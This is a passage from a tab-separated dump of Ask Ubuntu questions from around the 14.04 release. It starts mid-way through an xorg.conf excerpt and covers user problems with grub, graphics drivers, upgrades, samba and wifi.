'' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` benq gw2265 '' horizsync 30.0 - 83.0 vertrefresh 50.0 - 76.0 option `` dpms '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor1 '' vendorname `` unknown '' modelname `` hp l1740 '' horizsync 30.0 - 83.0 vertrefresh 50.0 - 76.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gtx 650 '' option `` coolbits '' `` 4 '' busid `` pci:1:0:0 '' screen 0 endsection section `` device '' identifier `` device1 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gtx 650 '' option `` coolbits '' `` 4 '' busid `` pci:1:0:0 '' screen 1 endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` stereo '' `` 0 '' option `` nvidiaxineramainfoorder '' `` dfp-2 '' option `` metamodes '' `` dvi-d-1 : nvidia-auto-select +0+0 '' option `` sli '' `` off '' option `` multigpu '' `` off '' option `` basemosaic '' `` off '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' identifier `` screen1 '' device `` device1 '' monitor `` monitor1 '' defaultdepth 24 option `` stereo '' `` 0 '' option `` metamodes '' `` vga-0 : nvidia-auto-select +0+0 '' option `` sli '' `` off '' option `` multigpu '' `` off '' option `` basemosaic '' `` off '' subsection `` display '' depth 24 endsubsection endsection a bit more info . when i go to system settings > screen display only my main monitor is detected . i 'm pretty sure my second monitor was there before .
450567	`` failed to start session '' after interrupted upgrade to 14.04	while upgrading to 14.04 using sudo do-release-upgrade my network connection was interrupted and several packages failed to upgrade . running do-release-upgrade again reported no new releases found but apt-get listed many packages `` kept back '' , so it seemed the system was in an intermediate state . i ran apt-get dist-upgrade which installed those packages again , then apt-get autoremove after which apt seemed happy . however , after restarting i can not log in at the gui prompt . after entering my password the error `` failed to start session '' appears in red . i am still able to log in from the command prompt , but i do n't know what to do to solve or debug the gui log in failure .
450570	modprobe fuse returns module fuse not found	i have ubuntu 12.04 and the kernel version is 2.6.32 linux user1 2.6.32-042stab083.2 # 1 smp fri nov 8 18:08:40 msk 2013 x86_64 x86_64 x86_64 gnu/linux when i run the command modprobe fuse it says fatal : module fuse not found . i have run apt-get remove libfuse2 and again installed fuse , libfuse and fuse-utils but still i get the error module fuse not found . regards
450573	best ubuntu version for my old laptop	i have an old 2005 hp laptop and since its performances are n't so good i 'd like to try ubuntu on it . the pc specs are as follow : amd turion 64 mobile technologyml-34 787mhz 1,00 gb ram can i install ubuntu on it , and if yes which is the most suitable version ? ? ? thanks in advance for your help !
450574	recent upgrade puts grub to rescue prompt	i woke up this morning to see the grub rescue prompt complaining about some highlight color being invalid . apparently the upgrade to 14.04 was installed last night after i went to sleep . so i am booted up on my old 12.10 disk . i tried boot-rescue , but i get the message `` please close all your package managers '' when attempting the recommended repair ( obviously , i dont have any open ) . here is my boot-info from boot-rescue : http : //paste.ubuntu.com/7283446/ my system has a windows8 disk ( totally separate disk ) , as well as a linux disk using lvm .. both ssds . and also a large data disk .
450575	time to dim the screen in ubuntu 14.04	ok so it seems that the key in org.gnome.settings-daemon.plugins.power idle-dim-time is gone in the new ubuntu version . since the old method increase screen idle dim timeout does n't work anymore are there any other ways to change this ?
450578	bumblebee has stopped working since update to 14.04	~/downloads/ftl $ optirun -vv ./ftl [ 3180.543769 ] [ debug ] reading file : /etc/bumblebee/bumblebee.conf [ 3180.544875 ] [ debug ] optirun version 3.2.1 starting ... [ 3180.544894 ] [ debug ] active configuration : [ 3180.544904 ] [ debug ] bumblebeed config file : /etc/bumblebee/bumblebee.conf [ 3180.544931 ] [ debug ] x display : :8 [ 3180.544966 ] [ debug ] ld_library_path : [ 3180.545003 ] [ debug ] socket path : /var/run/bumblebee.socket [ 3180.545042 ] [ debug ] accel/display bridge : auto [ 3180.545077 ] [ debug ] vgl compression : proxy [ 3180.545111 ] [ debug ] vglrun extra options : [ 3180.545144 ] [ debug ] primus ld path : /usr/lib/x86_64-linux-gnu/primus : /usr/lib/i386-linux-gnu/primus [ 3180.545282 ] [ debug ] using auto-detected bridge primus [ 3181.061842 ] [ info ] response : no - error : could not load gpu driver [ 3181.061861 ] [ error ] can not access secondary gpu - error : could not load gpu driver [ 3181.061867 ] [ debug ] socket closed . [ 3181.061887 ] [ error ] aborting because fallback start is disabled . [ 3181.061891 ] [ debug ] killing all remaining processes . the fact that bumblebee is unable to find a library path is odd to me , since i only recently updated bumblebee.conf like so : # # section with nvidia driver specific options , only parsed if driver=nvidia [ driver-nvidia ] # module name to load , defaults to driver if empty or unset kerneldriver=nvidia-331 pmmethod=auto # colon-separated path to the nvidia libraries librarypath=/usr/lib/nvidia-331 : /usr/lib32/nvidia-331 # comma-separated path of the directory containing nvidia_drv.so and the # default xorg modules path xorgmodulepath=/usr/lib/nvidia-331/xorg , /usr/lib/xorg/modules xorgconffile=/etc/bumblebee/xorg.conf.nvidia my laptop using a gefore gt 525m . all the modules appear to be in place : ~ $ find /lib/modules/ $ ( uname -r ) -name 'nvidia*.ko*' /lib/modules/3.13.0-24-generic/updates/dkms/nvidia_331.ko /lib/modules/3.13.0-24-generic/kernel/drivers/video/nvidia/nvidiafb.ko ~ $ find /usr/ -name 'nvidia_drv.so' /usr/lib/nvidia-331/xorg/nvidia_drv.so find : `/usr/share/doc/google-chrome-stable ' : permission denied and i have just updated bumblebee . is there some reason i 'm unable to use bumblebee to run programs on my video card ?
450579	how to install skype in xubuntu 14.04 lts 64 bit	i am trying to install skype in xubuntu 14.04 64bit from here . i tried ubuntu 10.04 32bit and ubuntu 12.04 ( multiarch ) . in xubuntu 14.04 64bit for both cases it is showing broken package message . could any one give me a solution of this problem .
450581	no lockscreen option in ccsm 14.04	i expected to find lockscreen option in ccsm after upgrading to ubuntu 14.04 , in unity plugin , general section , in order to switch between unity and lightdm . unfortunately , it 's not in the tab . why ?
450582	how do i view my ink tank levels	i have a canon ip3600 printer and was unable to print a test page out . though the driver is ok i think that one of the ink tanks may be empty , but with linux i can not view the status of the printer such as the ink tank levels and the head alignment etcetera . how do i get around this problem ?
450584	ubuntu 14.04 lts desktop not getting shutdown	my computer : intel i5-4440 quad core on intel motherboard db85fl ( built-in graphics ) . i upgraded to ubuntu 14.04 lts from 13.10 through 'software updater ' . the process was fully automatic and seamless . it is faster than its predecessor with better resolution . the 'suspend ' , 'reboot ' commands are working properly . but 'shutdown ' takes place for a second or two and the system reboots again . therefore , keeping the desktop always in 'suspend ' mode . please help me .
450585	unity set close button to right	how to set the close button to the right in ubuntu 14.04 ? i tried : gsettings set org.gnome.desktop.wm.preferences button-layout `` menu : minimize , maximize , close '' and gconftool -s /apps/metacity/general/button_layout -t string menu : minimize , maximize , close , but neither one worked . this used to work on earlier ubuntu versions . i even tried installing unity-tweak-tool ( though i would prefer a command line solution ) , but when i go to window controls and set the alignment to 'right ' , and close and reopen the application , it is still labeled to left .
450586	brightness function will not work on a dell 5521	i installed ubuntu 14.04lts , as my previous version , this version still does not support brightness control function . is there any solution to this problem . brightness bar decreases as well as increases on using of function but brightness itself does not .
450587	upgrade to ubuntu 14.04lts from 13.10 failed and now have a black screen	i tried to upgrade from ubuntu 13.10 to 14.04lts . in between it asked about some configuration files whether to keep or replace them , for all i chose to replace them on each prompt but at the end installation said the machine is corrupted and can not start . note : for kismet module while upgrading modules it gave an error popup . i get the black screen with blinking cursor and also the below error screen . ubuntu ext4-fs error ( device dm-0 ) : hdtree_dirblock_to_tree:920 when i hold shift key while boot then i can choose an older kernel version and then i can login inside , i see the version show in about ubuntu as 14.04lts . please help on how can i fix the issue as my machine by default does not start and i get the black screen with blinking cursor . regards ankit
450593	how do i eliminate screen tearing on 14.04 and xbmc with nvidia-331 ?	i have updated my 12.04 htpc to 14.04 ( new install ; same hardware ) , and have started getting awful screen tearing where i had none before . /proc/cpuinfo amd a4-3300 apu with radeon ( tm ) hd graphics lspci ... 01:00.0 vga compatible controller : nvidia corporation gt218 [ geforce 210 ] ( rev a2 ) ... lsmod ... nvidia 10675249 71 drm 302631 2 nvidia ... everything is from the official repos . xbmc_12.3+dfsg1-3ubuntu1_all.deb nvidia-331_331.38-0ubuntu7_amd64.deb
450596	can not use encrpyted home directory after upgrade to 14.04	my $ home directory is encrypted . it was ok in 13.10 , but , after upgraded to 14.04 desktop by do-release-upgrade , i can log in , however , the home has n't been decrypted , and cause many application crash . if i open nautilus for $ home , i can see this : after i clicked the access-your-private-data.desktop and input my password , which is not changed during the upgrade , i can see my home directory for a while , not very long . i found if i log in the system through ssh , i can see my all files in $ home , which means ssh can trigger the decryption correctly . but it does n't work if i log in through gdm or lightdm . what i have to do now is create another user , and log in the new user first , and ssh olduser @ localhost to trigger the decryption , and switch back to old user , then the home directory works for some times . another strange thing is that , sometimes , even the ssh still can access decrypted files , but the gui failed to access anything . is there anyone have the same problem with me ? does anyone know how to fix this ? thanks .
450597	how can i make home 's documents , pictures , videos , downloads to point their matching windows folders in a mounted ntfs partition ?	i 'd like ~/downloads , ~/documents etc . to be mapped ( or mounted.. ? or linked.. ? ) to my matching windows folders ( my ntfs partitions are auto-mounted at /mnt ) . in other words , what i want is that each time i save a file to ~/downloads , it will be created at windows ' `` my documents '' folder and so forth . how can i do that ?
450598	why does n't it work to install ubuntu ? please help !	i have tried so many times now but it does n't work ! i have an acer aspire v with windows 8.1 64-bit , 2.50 ghz amd quad-core processor a10-5757m , 512mb amd radeon hd 8650g graphics system memory , 8gb ddr3 memory and 1tb ( 1000gb ) hdd . i tried to install with usb because i do n't have a dvd-drive . i used universal-usb-installer , selected ubuntu 64-bit , browsed and found unbuntu-14.04-desktop-amd64.iso and selected it . i also selected the usb-drive i will install it on and clicked create . then it installed ubuntu on the usb . i restarted the computer with the usb-stick plugged in . then the acer title screen started to blink . i tried to tap the f12 button but it either not worked ! please help ! what do i need to do ?
450599	installing grub2 in efi-mode in usb flash drive	i 've two different os , which one is ubuntu . i 'm using a pc , not a mac . i use chimera bootloader that do n't find ubuntu . so , i 'd like to install grub 2 in efi-mode on flash-drive usb . in this way , i can load ubuntu only if the usb flash-drive is connected . i followed this guide https : //help.ubuntu.com/community/uefibooting replacing `` /dev/sda '' in sudo efibootmgr -- create -- gpt -- disk /dev/sda -- part 1 -- write-signature -- label `` grub2 '' -- loader `` \\efi\\grub\\grub.efi '' with the usb-pen directory . then , i 've copied the grub.cfg file that exists in ubuntu partition.result ? grub2 loads , but when i select the menu entries , grub2 does n't find any command , or disks . how can i fix this problem ? p.s . here , there are the photo of the error ( when i select ubuntu entry in grub2 ) , the usb-drive 's contents and the grub.cfg file http : //paste.ubuntu.com/7283661/
450602	nintendo ds unable to aquire ip from ubuntu 12.04	i want to connect my nintendo ds ( does not support wpa or ad-hoc ) to the internet , but i ca n't just change the encryption from wpa to wep every time i do so , so i connected my pc via ethernet cable to the router and now want to create a wireless network that the ds can use . i have followed the tutorial on this site by web-e , but when i want to connect to the network my ds says that it can not optain an ip address from the dhcp server . can somebody tell me why it is not working ? configs and logs : /etc/dhcp/dhcp.conf : ddns-update-style none ; log-facility local7 ; subnet 10.10.0.0 netmask 255.255.255.0 { range 10.10.0.2 10.10.0.16 ; option domain-name-servers 8.8.4.4 , 208.67.222.222 ; option routers 10.10.0.1 ; } /etc/hostapd/hostapd.conf interface=wlan0 driver=nl80211 ssid=testwifi15 hw_mode=g channel=1 macaddr_acl=0 auth_algs=1 ignore_broadcast_ssid=0 wep_default_key=0 wep_key0= '' passw '' wep_key_len_broadcast=5 wep_key_len_unicast=5 wep_rekey_period=300 /etc/network/interfaces : auto lo iface lo inet loopback auto eth0 iface eth0 inet dhcp auto wlan iface wlan0 inet static address 10.10.0.1 netmask 255.255.255.0 /var/log/syslog : upon startup : dhcpd : not configured to listen on any interfaces ! dhcpd : wrote 0 leases to leases file . dhcpd : no subnet declaration for wlan0 ( no ipv4 addresses ) . dhcpd : ** ignoring requests on wlan0 . if this is not what dhcpd : you want , please write a subnet declaration dhcpd : in your dhcpd.conf file for the network segment dhcpd : to which interface wlan0 is attached . ** upon trying to connect hostapd : wlan0 : sta 58 : bd : a3:29 : cc : b0 ieee 802.11 : authenticated hostapd : wlan0 : sta 58 : bd : a3:29 : cc : b0 ieee 802.11 : associated ( aid 1 ) hostapd : wlan0 : sta 58 : bd : a3:29 : cc : b0 radius : starting accounting session 535137c6-00000001
450603	correct permissions for sudo lamp /var/www directory	i am trying to set permissions with sudo 775 - r /var/www/ on all folders and all files in the www folder of lamp for sudo user . is this the correct way to set up the system ?
450604	how to get the current upload and download speeds in terminal ?	i want the terminal to output the current upload and download speeds of my network connection . i do not want to monitor the speeds in real time . i just want a `` static '' value to be able to write it in a file . how do i achieve it ?
450609	how to configure ppa to automatically point to use my current release code-name ?	i know i can get my current release code-name using lsb_release -cs but is there a way through which i can edit my ppa urls to use this command to point to the current release automatically ? my findings so far is that custom ppas are stored in this folder /etc/apt/sources.list.d
450613	find out which file a process is writing when pid changes all the time	using tools like iotop one can monitor the i/o of individual processes which is fine , but you do not find out which directory a process writes into . if the pid would always be the same that would not be a problem , one could strace or something else to find out which files are affected , or possibly lsof +p < pid > but i noticed chromium does some heavy disk writes when i open a video , despite the fact that i already put many directories associated with chromium on a tmpfs . now i would like to find out which directories it writes to in the instant iotop shows the high i/o usage . chromium does change the pid all the time , which makes this even more complex .
450614	problems installing 32bit program on 64bit system kubuntu 14.04	i have problems installing guitarpro 32bit on a 64bit system ! i knew that the ia32-libs package will install most 32bit programs , so when i run : sudo apt-get install ia32-libs the response is : reading package lists ... done building dependency tree reading state information ... done package ia32-libs is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source however the following packages replace it : lib32z1 lib32ncurses5 lib32bz2-1.0 e : package 'ia32-libs ' has no installation candidate ok , so i run : sudo apt-get install lib32z1 lib32ncurses5 lib32bz2-1.0 and they are already installed : reading package lists ... done building dependency tree reading state information ... done lib32bz2-1.0 is already the newest version . lib32ncurses5 is already the newest version . lib32z1 is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . so i try to install my program with : sudo dpkg -i gp6-full-linux-demo-r11621.deb and the results : selecting previously unselected package guitarpro6 . ( reading database ... 168283 files and directories currently installed . ) preparing to unpack gp6-full-linux-demo-r11621.deb ... unpacking guitarpro6 ( 6.1.6 ) ... dpkg : dependency problems prevent configuration of guitarpro6 : guitarpro6 depends on gksu . dpkg : error processing package guitarpro6 ( -- install ) : dependency problems - leaving unconfigured processing triggers for desktop-file-utils ( 0.22-1ubuntu1 ) ... processing triggers for gnome-menus ( 3.10.1-0ubuntu2 ) ... processing triggers for mime-support ( 3.54ubuntu1 ) ... errors were encountered while processing : guitarpro6 the next command is : sudo apt-get -f install but : sudo apt-get -f install [ sudo ] password for fr2632v3 : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages will be removed : guitarpro6 : i386 0 upgraded , 0 newly installed , 1 to remove and 0 not upgraded . 1 not fully installed or removed . after this operation , 226 mb disk space will be freed . do you want to continue ? [ y/n ] ( reading database ... 171183 files and directories currently installed . ) removing guitarpro6 ( 6.1.6 ) ... dpkg : warning : while removing guitarpro6 , directory '/opt/guitarpro6/data/soundbanks/acousticguitars/concerto-nylon/samples ' not empty so not removed dpkg : warning : while removing guitarpro6 , directory '/opt/guitarpro6/data/soundbanks/keyboards ' not empty so not removed dpkg : warning : while removing guitarpro6 , directory '/opt/guitarpro6/data/soundbanks/bass/pre-bass/samples ' not empty so not removed dpkg : warning : while removing guitarpro6 , directory '/opt/guitarpro6/data/soundbanks/electricguitars/strat-guitar/samples ' not empty so not removed dpkg : warning : while removing guitarpro6 , directory '/opt/guitarpro6/data/soundbanks/percussions ' not empty so not removed processing triggers for desktop-file-utils ( 0.22-1ubuntu1 ) ... processing triggers for gnome-menus ( 3.10.1-0ubuntu2 ) ... processing triggers for mime-support ( 3.54ubuntu1 ) ... and also : you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : gksu : conflicts : gksu : i386 but 2.0.2-6ubuntu2 is to be installed gksu : i386 : depends : libgksu2-0 : i386 ( > = 2.0.8 ) but it is not going to be installed depends : sudo : i386 conflicts : gksu but 2.0.2-6ubuntu2 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . it will be removed ! i really have no clue how to install this ! any help will be appreciated !
450616	how do i access the recovered files folder ?	after receiveing the notice that the ubuntuone service is shutting down , i went online to see how to transfer all my files to my laptop . it must have been a bonehead move but i pressed unsync , then quickly realized all my files were deleted . i immediately pressed recover deleted files and i got back a folder name recovered- [ number ] . i do n't know how to look into this folder to see my files from the browser so i installed the u1 client for mac , then logged in . i see the recovered folder , but there are no files in it . i had 4gb of pictures in there . how can i get it back ? in advance , thanks for your tips .
450617	ubuntu installation 14.04 bootloader or graphical	i tried to install ubuntu 14.04 so far without success . i 'm running asus efi bios . bios version : 2302 the graphics card is a amd a6-3500 apu with radeon graphics . motherboard : f1a75-v pro i created a usb stick with the amd-64.iso package , where i used the start media creator and i also tried the unetbootin . both installations fail , when i boot the pc from the usb device i see the first ubuntu screen . then the system shows ubuntu logo in the middle and after 3 times changing the dots i only see a black screen . i use a eizo flexscan l768 with dvi connection . i made a bios update already this morning but that did n't help to solve the issue . i hope anyone has an idea what the reason could be ? regards snofla
450618	move grub from windows drive to ubuntu drive	i have previously installed grub to my windows drive instead of my ubuntu drive . i have two physical drives sda & sdb . this has gone un-noticed for a long time because bios has automatically booted to my windows drive ( which has of course given me the grub menu ) . i would however like to move grub to my ubuntu drive , and let the windows drive stay 'clean ' from grub . is there a step-by-step guide to erase grub from my windows drive , and move it to my ubuntu drive ?
450619	upgrade to 14.04 with dual boot win8 . i broke grub	so i 'm new at this . it 's the second time i messed up the bootloader . i upgraded from ubuntu 13 to 14 and when i boot the pc it shows : error : symbol 'grub_term_highlight_color ' not found grub rescue > this question has been posted before but i 'd like an detailed explanation of how to restore the boot order . somehow i can access ubuntu but not windows , when i select the partition it does n't boot ( black screen ) . please help ! i do n't want to do anything stupid , because last time i messed up the hdd . thanks
450620	trusty is not installing programs/icons such as dropbox on the top panel bar . anyone know a fix ?	this is not only a dropbox issue it 's for other programs that also want to reside in the top bar . anyone know how to resolve
450623	samba account has no permission in es file explorer	i have a tablet with android on which i installed es file explorer so that i can access files on my pc with ubuntu . i do this using the samba protocol . it works fine when i use my administrator account when defining the new server in es file explorer . i can see and access all files . using the samba program under ubuntu , i defined another samba user and gave this user permission to access dir1 . trying to access dir1 from my tablet with the corresponding credentials , i get the error login fails . this may be caused by : - the account has no permissions . looking at the permission of dir1 with ls -l , i get drwxr-xr-x , which is correct , i believe . what am i doing wrong ? my smb.conf : [ global ] workgroup = < < workgroup > > server string = % h server ( samba , ubuntu ) dns proxy = no log file = /var/log/samba/log. % m max log size = 1000 syslog = 0 panic action = /usr/share/samba/panic-action % d # # # # # # # authentication # # # # # # # # `` security = user '' is always a good idea . this will require a unix account # in this server for every user accessing the server . see # /usr/share/doc/samba-doc/htmldocs/samba3-howto/servertype.html # in the samba-doc package for details . # security = user # you may wish to use password encryption . see the section on # 'encrypt passwords ' in the smb.conf ( 5 ) manpage before enabling . ; encrypt passwords = yes # if you are using encrypted passwords , samba will need to know what # password database type you are using . ; passdb backend = tdbsam obey pam restrictions = yes # this boolean parameter controls whether samba attempts to sync the unix # password with the smb password when the encrypted smb password in the # passdb is changed . unix password sync = yes # for unix password sync to work on a debian gnu/linux system , the following # parameters must be set ( thanks to ian kahan < < kahan @ informatik.tu-muenchen.de > for # sending the correct chat script for the passwd program in debian sarge ) . passwd program = /usr/bin/passwd % u passwd chat = *enter\snew\s*\spassword : * % n\n *retype\snew\s*\spassword : * % n\n *password\supdated\ssuccessfully* . # this boolean controls whether pam will be used for password changes # when requested by an smb client instead of the program listed in # 'passwd program ' . the default is 'no ' . pam password change = yes # this option controls how unsuccessful authentication attempts are mapped # to anonymous connections map to guest = bad user # # # # # # # # # # domains # # # # # # # # # # # # is this machine able to authenticate users . both pdc and bdc # must have this setting enabled . if you are the bdc you must # change the 'domain master ' setting to no # ; domain logons = yes # # the following setting only takes effect if 'domain logons ' is set # it specifies the location of the user 's profile directory # from the client point of view ) # the following required a [ profiles ] share to be setup on the # samba server ( see below ) ; logon path = \\ % n\profiles\ % u # another common choice is storing the profile in the user 's home directory # ( this is samba 's default ) # logon path = \\ % n\ % u\profile # the following setting only takes effect if 'domain logons ' is set # it specifies the location of a user 's home directory ( from the client # point of view ) ; logon drive = h : # logon home = \\ % n\ % u # the following setting only takes effect if 'domain logons ' is set # it specifies the script to run during logon . the script must be stored # in the [ netlogon ] share # note : must be store in 'dos ' file format convention ; logon script = logon.cmd # this allows unix users to be created on the domain controller via the samr # rpc pipe . the example command creates a user account with a disabled unix # password ; please adapt to your needs ; add user script = /usr/sbin/adduser -- quiet -- disabled-password -- gecos `` '' % u # this allows machine accounts to be created on the domain controller via the # samr rpc pipe . # the following assumes a `` machines '' group exists on the system ; add machine script = /usr/sbin/useradd -g machines -c `` % u machine account '' -d /var/lib/samba -s /bin/false % u # this allows unix groups to be created on the domain controller via the samr # rpc pipe . ; add group script = /usr/sbin/addgroup -- force-badname % g # # # # # # # # # # printing # # # # # # # # # # # if you want to automatically load your printer list rather # than setting them up individually then you 'll need this # load printers = yes # lpr ( ng ) printing . you may wish to override the location of the # printcap file ; printing = bsd ; printcap name = /etc/printcap # cups printing . see also the cupsaddsmb ( 8 ) manpage in the # cupsys-client package . ; printing = cups ; printcap name = cups # # # # # # # # # # # # misc # # # # # # # # # # # # # using the following line enables you to customise your configuration # on a per machine basis . the % m gets replaced with the netbios name # of the machine that is connecting ; include = /home/samba/etc/smb.conf. % m # most people will find that this option gives better performance . # see smb.conf ( 5 ) and /usr/share/doc/samba-doc/htmldocs/samba3-howto/speed.html # for details # you may want to add the following on a linux system : # so_rcvbuf=8192 so_sndbuf=8192 # socket options = tcp_nodelay # the following parameter is useful only if you have the linpopup package # installed . the samba maintainer and the linpopup maintainer are # working to ease installation and configuration of linpopup and samba . ; message command = /bin/sh -c '/usr/bin/linpopup `` % f '' `` % m '' % s ; rm % s ' & # domain master specifies samba to be the domain master browser . if this # machine will be configured as a bdc ( a secondary logon server ) , you # must set this to 'no ' ; otherwise , the default behavior is recommended . # domain master = auto # some defaults for winbind ( make sure you 're not using the ranges # for something else . ) ; idmap uid = 10000-20000 ; idmap gid = 10000-20000 ; template shell = /bin/bash # the following was the default behaviour in sarge , # but samba upstream reverted the default because it might induce # performance issues in large organizations . # see debian bug # 368251 for some of the consequences of *not* # having this setting and smb.conf ( 5 ) for details . ; winbind enum groups = yes ; winbind enum users = yes # setup usershare options to enable non-root users to share folders # with the net usershare command . # maximum number of usershare . 0 ( default ) means that usershare is disabled . ; usershare max shares = 100 # allow users who 've been granted usershare privileges to create # public shares , not just authenticated ones usershare allow guests = yes username map = /etc/samba/smbusers security = user ; guest ok = no ; guest account = nobody # ======================= share definitions ======================= # un-comment the following ( and tweak the other settings below to suit ) # to enable the default home directory shares . this will share each # user 's home director as \\server\username ; [ homes ] ; comment = home directories ; browseable = no # by default , the home directories are exported read-only . change the # next parameter to 'no ' if you want to be able to write to them . ; read only = yes # file creation mask is set to 0700 for security reasons . if you want to # create files with group=rw permissions , set next parameter to 0775. ; create mask = 0700 # directory creation mask is set to 0700 for security reasons . if you want to # create dirs . with group=rw permissions , set next parameter to 0775. ; directory mask = 0700 # by default , \\server\username shares can be connected to by anyone # with access to the samba server . un-comment the following parameter # to make sure that only `` username '' can connect to \\server\username # the following parameter makes sure that only `` username '' can connect # # this might need tweaking when using external authentication schemes ; valid users = % s # un-comment the following and create the netlogon directory for domain logons # ( you need to configure samba to act as a domain controller too . ) ; [ netlogon ] ; comment = network logon service ; path = /home/samba/netlogon ; guest ok = yes ; read only = yes # un-comment the following and create the profiles directory to store # users profiles ( see the `` logon path '' option above ) # ( you need to configure samba to act as a domain controller too . ) # the path below should be writable by all users so that their # profile directory may be created the first time they log on ; [ profiles ] ; comment = users profiles ; path = /home/samba/profiles ; guest ok = no ; browseable = no ; create mask = 0600 ; directory mask = 0700 [ printers ] comment = all printers browseable = no path = /var/spool/samba printable = yes ; guest ok = no ; read only = yes create mask = 0700 # windows clients look for this share name as a source of downloadable # printer drivers [ print $ ] comment = printer drivers path = /var/lib/samba/printers ; browseable = yes ; read only = yes ; guest ok = no # uncomment to allow remote administration of windows print drivers . # you may need to replace 'lpadmin ' with the name of the group your # admin users are members of . # please note that you also need to set appropriate unix permissions # to the drivers directory for these users to have write rights in it ; write list = root , @ lpadmin # a sample share for sharing your cd-rom with others . ; [ cdrom ] ; comment = samba server 's cd-rom ; read only = yes ; locking = no ; path = /cdrom ; guest ok = yes # the next two parameters show how to auto-mount a cd-rom when the # cdrom share is accesed . for this to work /etc/fstab must contain # an entry like this : # # /dev/scd0 /cdrom iso9660 defaults , noauto , ro , user 0 0 # # the cd-rom gets unmounted automatically after the connection to the # # if you do n't want to use auto-mounting/unmounting make sure the cd # is mounted on /cdrom # ; preexec = /bin/mount /cdrom ; postexec = /bin/umount /cdrom [ < < dir1 > > ] path = < < dir1 > > writeable = yes ; browseable = yes valid users = < < user_all_access > > [ < < dir2 > > ] path = < < dir2 > > ; writeable = no ; browseable = yes valid users = < < user_limited_access > >
450625	how do i configure multiple keyboard layouts in xubuntu 14.04	there is settings > keyboard > layout and there is something called ibus and input methods . i were using keyboard > layout gui to configure my layouts in 13.10 and it worked fine . but after update to 14.04 something called ibus appeared and now my shortcut alt+shift is not working . looks like something is intercepting this hotkey . if i set hotkey to something else in keyboard > layout it 's working : i can change my layout , but if i set it to alt+shift it 's not working at all . what are those different methods of keyboard input configuration ? what method is preferred ? how do i enable only one preferred method and disable another one in order to prevent conflicts ? there is ibus icon on the panel . when i click on it , a drop-down menu appears with two input methods . but when i select one of them , nothing happens . the input language is still the same . please advise . thank you !
450630	get back ubuntu desktop	i ran these commands : sudo add-apt-repository ppa : gnome3-team/gnome3-staging sudo apt-get update & & sudo apt-get dist-upgrade sudo apt-get install gnome-weather gnome-music gnome-maps cheese gnome-documents these have made my my desktop from this : to this : i tried reverting the effect by these cmds : sudo apt-get remove gnome-weather gnome-music gnome-maps cheese gnome-documents sudo add-apt-repository -r ppa : gnome3-team/gnome3-staging sudo apt-get update & & sudo apt-get dist-upgrade sudo /usr/lib/lightdm/lightdm-set-defaults -s ubuntu sudo apt-get install -- reinstall ubuntu-desktop how do i get my previous ubuntu back ? sombody please help . it has got really ugly ! !
450631	broadcom b43 wifi not working in ubuntu 14.04 lts	i have installed ubuntu 14.04 lts on my laptop . under the networking menu at the top , it is not showing any wifi options . how can i get wifi working in ubuntu 14.04 lts ? i have a broadcom bcm4311 wlan card .
450635	how to change toolbar/right-click menu font size ?	i 'm new to ubuntu and my toolbar font is hardly readable , so is the right-click menu font and clock . i did n't have this problem at first but after a few startups . any solutions ?
450636	14.04 : can not sign into youtube webapp	can not sign into my account using the youtube webapp on ubuntu 14.04 because everytime i click on the signin button inside the youtube 's homepage on the webapp , it opens a new window of the default browser ( firefox ) with the google login page . even checking to stay signed on thisnew window and completing here the signin process , there is no consequence on the webapp where i can continue only unsigned .
450639	upgrading not finished : how to correct issues or even finish the upgrade ?	i upgraded over night my computer . but this morning , not knowing that the life expectancy of my computer without energy cable plugged in is about 20 minutes : p , someone unplugged it and it shut down . so apparently , it was saying something about delete apps , i suppose that it was at the cleaning step . but there are two visible problems ( i do n't know if there are other , not visible ... ) : ( the same happens for the batteries panel ( charge level line ) and the calendar panel ( events ) ) and my windows are rectangle and with weird borders : what would be best is to finish the install . but is it even possible ? thanks a lot ! p.s . : with 13.10 i had always a problem with maximising : by dragging the window on the upper bar to maximise it , at the moment that i released the window , there was â  % risk that unity freeze . i always went then to tty1 and rebooted . has someone already experienced this issue on 14.04 ? ( hopefully not ! ; ) )
450645	ubuntu dist-upgrade failure from 13.10 to 14.04 lts	i have tried to upgrade ubuntu in graphical mode from 13.10 to 14.04 but i 've got this error : '' could not calculate the upgrade '' what should i do next ?
450646	system backup for testing new apps/settings	i am new to linux , and have been installing ubuntu again and again because i mess up something while trying different set-ups . i would like to have an incremental snapshot of my system so that i can revert to what i had when i made the backup . can i achieve what i want using either deja-dup or back in time ? and if so , what directories do i need to back up ? i have seen posts that say that backing up the /home directory is enough , but it has failed me once , and i do n't see how that works . does it store all my settings & apps , things like shellscripts i add to the /bin directory ( am i even supposed to do that ? ) , or changes i make when i edit stuff like /etc/sysctl.conf ? sorry for my poor english , what i basically want is this how to make a disk image and restore from it later ? except i do n't use wubi . i am wondering if hard links or lvm 's can save my disk space & time . i do a lot of swiching languages back and forth , and it almost never goes back to what i originally had , especially input method . as both a new linux user and a non-english speaker , any suggestions for terms i can use to google would also help me alot . thank you . ( i tried lvm snapshots following instructions on askubuntu , and failed . i would like to learn what i did wrong in the future , but it seems that it is not intended for keeping multiple snapshots , so this is probably not a choice for me at the moment right ? )
450651	files not being read when opening it on windows !	i 'd downloaded a few files to ubuntu and then moved the files to an external hdd . when i read it on windows 8 , it could not read those files ! so i performed disk check on windows ( i read this solution on forums ) and those files got lost : ( so , why is this happening ? i 've more files to transfer ! what to do ? also , can my previous files be recovered in any way ?
